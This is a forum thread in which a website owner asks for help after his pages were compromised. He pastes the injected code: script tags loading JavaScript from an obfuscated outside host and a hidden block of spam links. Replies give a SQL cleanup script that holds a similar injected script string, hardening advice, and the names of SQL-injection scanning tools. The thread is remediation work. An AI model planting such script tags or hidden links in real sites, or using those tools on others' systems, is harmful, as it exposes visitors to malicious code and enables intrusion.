28,390
社区成员
发帖
与我相关
我的任务
分享网页中木马了,急,谁能给我指点解决办法啊
分别中了下面代码被挂上的,很烦那些人为何要这样做,网站根本打不开,一直弹出广告页!
<script src=http://%77%76%67%37%2E%63%6E></script><script src=http://%77%76%67%37%2E%63%6E></script><script type='text/javascript' language='JavaScript1.2' src='Inc/Southidcmenu.js'></script>
<div style="position:absolute;left:expression(1-900);top:expression(3-999);">友情链接:<a <a href="http://www.banchanggongsi.net.cn/">大众搬家公司</a> <a href="http://www.120pifubing.com/">神经性皮炎</a> <a href="http://www.deppon56.cn/">德邦物流</a> <a href="http://www.021gongxing.net.cn/">上海公兴搬家公司</a> <a href="http://www.srwxds.cn/">上海卫星天线安装</a> <a href="http://www.0755tv.org.cn/">深圳卫星电视安装</a> <a href="http://www.957953.com/">软中华</a> </div>
<script src=http://%77%76%67%37%2E%63%6E></script>
<script src=http://%77%76%67%37%2E%63%6E></script><script src=http://%77%76%67%37%2E%63%6E></script><script type='text/javascript' language='JavaScript1.2' src='Inc/Southidcmenu.js'></script>
<div style="position:absolute;left:expression(1-900);top:expression(3-999);">友情链接:<a <a href="http://www.banchanggongsi.net.cn/">大众搬家公司</a> <a href="http://www.120pifubing.com/">神经性皮炎</a> <a href="http://www.deppon56.cn/">德邦物流</a> <a href="http://www.021gongxing.net.cn/">上海公兴搬家公司</a> <a href="http://www.srwxds.cn/">上海卫星天线安装</a> <a href="http://www.0755tv.org.cn/">深圳卫星电视安装</a> <a href="http://www.957953.com/">软中华</a> </div>
<script src=http://%77%76%67%37%2E%63%6E></script>
...全文
请发表友善的回复…
发表回复
weihanmingwhmwhm 2009-06-24
- 打赏
- 举报
[Quote=引用 3 楼 taito 的回复:]
1、检查自己的程序可以上传的部分。或者把除数据库外的其它文件和目录都屏蔽掉写入权限
2、如果是优秀的空间就会在get,post提交时进行过滤,是可以过滤基本的木马程序的,所以找到合适的空间商最好。
3、如果是Sql数据库中被挂了,就按上面的方法做吧
[/Quote]
可是问他们,他们都说他们的安全,结果又不帮处理!
1、检查自己的程序可以上传的部分。或者把除数据库外的其它文件和目录都屏蔽掉写入权限
2、如果是优秀的空间就会在get,post提交时进行过滤,是可以过滤基本的木马程序的,所以找到合适的空间商最好。
3、如果是Sql数据库中被挂了,就按上面的方法做吧
[/Quote]
可是问他们,他们都说他们的安全,结果又不帮处理!
weihanmingwhmwhm 2009-06-24
- 打赏
- 举报
[Quote=引用 4 楼 phoenixIT 的回复:]
最好的解决办法就是好好看看你的代码 你的代码应该有些漏洞 所以被他们入侵了! 你用“啊D”和“明小子” 扫一下 看看有什么漏洞 你就补一补!
[/Quote]
看得出,但攻击过来也快呀
最好的解决办法就是好好看看你的代码 你的代码应该有些漏洞 所以被他们入侵了! 你用“啊D”和“明小子” 扫一下 看看有什么漏洞 你就补一补!
[/Quote]
看得出,但攻击过来也快呀
weihanmingwhmwhm 2009-06-24
- 打赏
- 举报
[Quote=引用 2 楼 mark271828 的回复:]
我以前也碰到过这个问题,直接的办法是在数据库把他挂进去的代码全部替换掉
declare @name as nvarchar(128),@columnName as nvarchar(128),@columnType as nvarchar(128),@injectSql as nvarchar(111)
set @injectSql=' <Script Src=http://%63%2Enuclear3.com/css/c.js> </Script>'
DECLARE curLabel CURSOR FOR select name from sysobjects where xtype='U'
OPEN curLabel
FETCH NEXT FROM curLabel INTO …
[/Quote]
谢谢,但服务器是别人的,虚拟主机
我以前也碰到过这个问题,直接的办法是在数据库把他挂进去的代码全部替换掉
declare @name as nvarchar(128),@columnName as nvarchar(128),@columnType as nvarchar(128),@injectSql as nvarchar(111)
set @injectSql=' <Script Src=http://%63%2Enuclear3.com/css/c.js> </Script>'
DECLARE curLabel CURSOR FOR select name from sysobjects where xtype='U'
OPEN curLabel
FETCH NEXT FROM curLabel INTO …
[/Quote]
谢谢,但服务器是别人的,虚拟主机
taito 2009-06-23
- 打赏
- 举报
1、检查自己的程序可以上传的部分。或者把除数据库外的其它文件和目录都屏蔽掉写入权限
2、如果是优秀的空间就会在get,post提交时进行过滤,是可以过滤基本的木马程序的,所以找到合适的空间商最好。
3、如果是Sql数据库中被挂了,就按上面的方法做吧
2、如果是优秀的空间就会在get,post提交时进行过滤,是可以过滤基本的木马程序的,所以找到合适的空间商最好。
3、如果是Sql数据库中被挂了,就按上面的方法做吧
mark271828 2009-06-23
- 打赏
- 举报
我以前也碰到过这个问题,直接的办法是在数据库把他挂进去的代码全部替换掉
declare @name as nvarchar(128),@columnName as nvarchar(128),@columnType as nvarchar(128),@injectSql as nvarchar(111)
set @injectSql='<Script Src=http://%63%2Enuclear3.com/css/c.js></Script>'
DECLARE curLabel CURSOR FOR select name from sysobjects where xtype='U'
OPEN curLabel
FETCH NEXT FROM curLabel INTO @name
WHILE @@FETCH_STATUS = 0
BEGIN
DECLARE curLabel1 CURSOR FOR SELECT Column_name,data_type FROM INFORMATION_SCHEMA.COLUMNS WHERE (TABLE_NAME = @name)
OPEN curLabel1
FETCH NEXT FROM curLabel1 INTO @columnName,@columnType
WHILE @@FETCH_STATUS = 0
BEGIN
if((@columnType='text' or @columnType='ntext'))
--print 1
BEGIN TRY
declare @primaryKey nvarchar(255);
SELECT @primaryKey=primaryKey from
(select
c.name as primaryKey,
case when c.colid in(select ik.colid
from sysindexes i, Sysindexkeys ik, sysobjects oo
where i.id=ik.id and i.indid=ik.indid
and i.name=oo.name and oo.xtype='PK' --主键
and o.id=i.id
) then 1 else 0 end isPrimaryKey
from sysobjects o inner join syscolumns c on o.id=c.id
where o.xtype='U'
and o.name=@name) as t where isPrimaryKey=1
exec('declare @ptr varbinary(16);declare @id nvarchar(16);declare curText scroll Cursor for select textptr('+@columnName+'),'+@primaryKey+' from '+@name+';declare @Position int,@len int;OPEN curText;FETCH NEXT FROM curText INTO @ptr,@id;WHILE @@FETCH_STATUS=0 BEGIN;select @Position=patindex(''%'+@injectSql+'%'','+@columnName+') from '+@name+' where '+@primaryKey+'=@id;while @Position>0 begin;set @Position=@Position-1;updatetext '+@name+'.'+@columnName+' @ptr @Position @len '''';select @Position=patindex(''%'+@injectSql+'%'','+@columnName+') from '+@name+' where '+@primaryKey+'=@id;end;FETCH NEXT FROM curText INTO @ptr,@id;END;CLOSE curText;DEALLOCATE curText')
END TRY
BEGIN CATCH
print(@name+'.'+@columnName)
END CATCH;
else
if(@columnType='nvarchar' or @columnType='varchar')
exec('update '+@name+' set '+@columnName+'=replace('+@columnName+','''+@injectSql+''','''')')
FETCH NEXT FROM curLabel1 INTO @columnName,@columnType
END
CLOSE curLabel1
DEALLOCATE curLabel1
FETCH NEXT FROM curLabel INTO @name
END
CLOSE curLabel
DEALLOCATE curLabel
当然最重要的是补好自己网站和服务器的漏洞
declare @name as nvarchar(128),@columnName as nvarchar(128),@columnType as nvarchar(128),@injectSql as nvarchar(111)
set @injectSql='<Script Src=http://%63%2Enuclear3.com/css/c.js></Script>'
DECLARE curLabel CURSOR FOR select name from sysobjects where xtype='U'
OPEN curLabel
FETCH NEXT FROM curLabel INTO @name
WHILE @@FETCH_STATUS = 0
BEGIN
DECLARE curLabel1 CURSOR FOR SELECT Column_name,data_type FROM INFORMATION_SCHEMA.COLUMNS WHERE (TABLE_NAME = @name)
OPEN curLabel1
FETCH NEXT FROM curLabel1 INTO @columnName,@columnType
WHILE @@FETCH_STATUS = 0
BEGIN
if((@columnType='text' or @columnType='ntext'))
--print 1
BEGIN TRY
declare @primaryKey nvarchar(255);
SELECT @primaryKey=primaryKey from
(select
c.name as primaryKey,
case when c.colid in(select ik.colid
from sysindexes i, Sysindexkeys ik, sysobjects oo
where i.id=ik.id and i.indid=ik.indid
and i.name=oo.name and oo.xtype='PK' --主键
and o.id=i.id
) then 1 else 0 end isPrimaryKey
from sysobjects o inner join syscolumns c on o.id=c.id
where o.xtype='U'
and o.name=@name) as t where isPrimaryKey=1
exec('declare @ptr varbinary(16);declare @id nvarchar(16);declare curText scroll Cursor for select textptr('+@columnName+'),'+@primaryKey+' from '+@name+';declare @Position int,@len int;OPEN curText;FETCH NEXT FROM curText INTO @ptr,@id;WHILE @@FETCH_STATUS=0 BEGIN;select @Position=patindex(''%'+@injectSql+'%'','+@columnName+') from '+@name+' where '+@primaryKey+'=@id;while @Position>0 begin;set @Position=@Position-1;updatetext '+@name+'.'+@columnName+' @ptr @Position @len '''';select @Position=patindex(''%'+@injectSql+'%'','+@columnName+') from '+@name+' where '+@primaryKey+'=@id;end;FETCH NEXT FROM curText INTO @ptr,@id;END;CLOSE curText;DEALLOCATE curText')
END TRY
BEGIN CATCH
print(@name+'.'+@columnName)
END CATCH;
else
if(@columnType='nvarchar' or @columnType='varchar')
exec('update '+@name+' set '+@columnName+'=replace('+@columnName+','''+@injectSql+''','''')')
FETCH NEXT FROM curLabel1 INTO @columnName,@columnType
END
CLOSE curLabel1
DEALLOCATE curLabel1
FETCH NEXT FROM curLabel INTO @name
END
CLOSE curLabel
DEALLOCATE curLabel
当然最重要的是补好自己网站和服务器的漏洞
hychina613 2009-06-23
- 打赏
- 举报
学习一下,,用卡巴吧,或者是重新编辑
日月同辉FY 2009-06-23
- 打赏
- 举报
最好的解决办法就是好好看看你的代码 你的代码应该有些漏洞 所以被他们入侵了! 你用“啊D”和“明小子” 扫一下 看看有什么漏洞 你就补一补!
